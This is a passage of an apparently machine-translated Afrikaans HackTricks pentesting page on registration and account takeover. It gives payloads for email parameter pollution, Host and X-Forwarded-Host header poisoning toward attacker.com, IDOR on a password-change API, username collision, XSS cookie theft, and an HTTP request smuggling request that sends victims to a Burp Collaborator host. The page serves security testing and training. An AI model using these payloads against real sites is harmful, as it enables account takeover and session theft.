Registrasie & Oorname Kw vulnerabilities

Reading time: 7 minutes

tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks

Kyk na die subskripsie planne!
Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

Registrasie Oorname

Dubbele Registrasie

Probeer om te genereer met 'n bestaande gebruikersnaam
Kontroleer verskillende e-pos:
hoofletters
+1@
voeg 'n punt in die e-pos by
spesiale karakters in die e-pos naam (%00, %09, %20)
Sit swart karakters na die e-pos: test@test.com a
victim@gmail.com@attacker.com
victim@attacker.com@gmail.com

Gebruikersnaam Enumerasie

Kontroleer of jy kan uitvind wanneer 'n gebruikersnaam reeds in die toepassing geregistreer is.

Wagwoordbeleid

Skep 'n gebruiker en kontroleer die wagwoordbeleid (kontroleer of jy swak wagwoorde kan gebruik).
In daardie geval kan jy probeer om akrediteer te brute-force.

SQL Inbraak

Kontroleer hierdie bladsy om te leer hoe om rekeningoorname te probeer of inligting te onttrek via SQL Inbrake in registrasievorms.

Verander E-pos

Wanneer geregistreer, probeer om die e-pos te verander en kontroleer of hierdie verandering korrek geverifieer word of of jy dit na arbitrêre e-posse kan verander.

Meer Kontroles

Kontroleer of jy weggooie e-posse kan gebruik
Lang wagwoord (>200) lei tot DoS
Kontroleer koerslimiete op rekeningcreasie
Gebruik username@burp_collab.net en analiseer die terugroep

Wagwoord Herstel Oornames

Wagwoord Herstel Token Lek Via Verwysing

Versoek wagwoord herstel na jou e-posadres
Klik op die wagwoord herstel skakel
Moet nie wagwoord verander nie
Klik op enige 3de party webwerwe (bv: Facebook, twitter)
Intercepteer die versoek in Burp Suite proxy
Kontroleer of die verwysingskop lek wagwoord herstel token.

Wagwoord Herstel Besmetting

Intercepteer die wagwoord herstel versoek in Burp Suite
Voeg of wysig die volgende koppe in Burp Suite : Host: attacker.com, X-Forwarded-Host: attacker.com
Stuur die versoek met die gewysigde kop
http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com
Soek vir 'n wagwoord herstel URL gebaseer op die host header soos : https://attacker.com/reset-password.php?token=TOKEN

Wagwoord Herstel Via E-pos Parameter

bash

# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com

IDOR op API Parameters

Aanvaller moet met hul rekening aanmeld en na die Verander wagwoord funksie gaan.
Begin die Burp Suite en onderskep die versoek.
Stuur dit na die herhaler tab en wysig die parameters: User ID/e-pos
powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})

Die wagwoord herstel token moet ewekansig gegenereer en uniek wees elke keer.
Probeer om te bepaal of die token verval of as dit altyd dieselfde is; in sommige gevalle is die generasie-algoritme swak en kan dit geraai word. Die volgende veranderlikes mag deur die algoritme gebruik word.

Tydstempel
UserID
E-pos van gebruiker
Voornaam en Van
Geboortedatum
Kriptografie
Slegs nommer
Klein token volgorde (karakters tussen [A-Z,a-z,0-9])
Token hergebruik
Token vervaldatum

Lekke Wagwoord Herstel Token

Trigger 'n wagwoord herstel versoek deur die API/UI vir 'n spesifieke e-pos, bv: test@mail.com
Ondersoek die bediener se antwoord en kyk vir resetToken
Gebruik dan die token in 'n URL soos https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]

Wagwoord Herstel Deur Gebruikersnaam Botsing

Registreer op die stelsel met 'n gebruikersnaam wat identies is aan die slagoffer se gebruikersnaam, maar met spasie voor en/of na die gebruikersnaam ingevoeg. bv: "admin "
Versoek 'n wagwoord herstel met jou kwaadwillige gebruikersnaam.
Gebruik die token wat na jou e-pos gestuur is en herstel die slagoffer se wagwoord.
Sluit aan by die slagoffer se rekening met die nuwe wagwoord.

Die platform CTFd was kwesbaar vir hierdie aanval.
Sien: CVE-2020-7245

Rekening Oorname Deur Cross Site Scripting

Vind 'n XSS binne die toepassing of 'n subdomein as die koekies op die ouerdomein gescope is: *.domain.com
Lek die huidige sessies koekie
Verifieer as die gebruiker met behulp van die koekie

Rekening Oorname Deur HTTP Versoek Smuggling

1. Gebruik smuggler om die tipe HTTP Versoek Smuggling (CL, TE, CL.TE) te detecteer
powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h
2. Stel 'n versoek op wat die POST / HTTP/1.1 met die volgende data sal oorskryf:
GET http://something.burpcollaborator.net HTTP/1.1 X: met die doel om die slagoffers na burpcollab te herlei en hul koekies te steel
3. Finale versoek kan soos die volgende lyk

GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X

Hackerone verslae wat hierdie fout benut
* https://hackerone.com/reports/737140
* https://hackerone.com/reports/771666